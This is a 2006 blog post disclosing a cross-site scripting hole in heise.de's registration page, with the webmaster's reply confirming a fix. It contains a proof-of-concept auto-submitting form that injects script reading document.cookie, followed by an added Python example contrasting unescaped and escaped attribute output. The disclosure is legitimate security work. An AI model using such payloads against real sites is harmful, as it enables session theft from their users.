XSS on heise.de

morph3us.org


  (Tuesday, January 3. 2006)
heise.de - a German news site for, amongst others, security-related topics - is vulnerable to XSS (Cross Site Scripting). I contacted the webmaster of heise.de about this on December 23, but I did not receive an answer and the XSS vulnerability is still not addressed.

PoC:
<form method="post" action="http://www.heise.de/registration/"
  name="heise">
  <input type="text" name="uid" size="20" value=''>
  <input type="text" name="vorname" size="20"
 value='"><script>alert(document.cookie)</script>'>
  <input type="text" name="name" size="20"
 value='"><script>alert(document.cookie)</script>'>
</form>
<body onload="heise.submit();">

heise-xss-poc.txt
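
The `">` prefix in the PoC values suggests that the posted fields are echoed back into a double-quoted value attribute without encoding. The following is an added example, not part of the original post and not heise.de's code: it shows that assumed pattern next to the escaped form and parses both outputs to see which tags a browser-style parser would find. The function and class names are hypothetical.

```python
import html
from html.parser import HTMLParser

# Payload taken from the PoC above (the 'vorname' and 'name' fields).
POC_VALUE = '"><script>alert(document.cookie)</script>'


def render_input_unescaped(field, value):
    """Assumed vulnerable pattern: the posted value is pasted into the attribute as-is."""
    return '<input type="text" name="%s" size="20" value="%s">' % (field, value)


def render_input_escaped(field, value):
    """Hardened form: encode &, <, >, " and ' before writing into the attribute."""
    return '<input type="text" name="%s" size="20" value="%s">' % (
        html.escape(field, quote=True), html.escape(value, quote=True))


class TagAudit(HTMLParser):
    """Records every start tag and the value attribute of each <input>."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.tags = []
        self.input_values = []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)
        if tag == "input":
            self.input_values.append(dict(attrs).get("value"))


def audit(markup):
    """Return (start tags seen, value attributes of inputs) for a markup string."""
    parser = TagAudit()
    parser.feed(markup)
    parser.close()
    return parser.tags, parser.input_values


if __name__ == "__main__":
    for render in (render_input_unescaped, render_input_escaped):
        tags, values = audit(render("vorname", POC_VALUE))
        print(render.__name__, "tags:", tags, "input values:", values)
```

With the unescaped renderer the parser sees a separate script element and an empty input value; with the escaped renderer it sees a single input whose value is the submitted string.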

UPDATE: 2006-01-09: 20:26
Hello Mr. Waldegger,

Thank you very much for your report. Because of the holidays, the fix unfortunately took a little longer.

Kind regards
heise online
Webmaster

Comments

[...] I already mentioned in a previous blog posting titled XSS on heise.de there was a XSS vulnerability on heise.de. I informed heise's webmaster about this bug on [...]
#1 Beat me, break me. - Blog Archive » How-to fake heise news entries (Homepage) on 2007-02-16 16:24
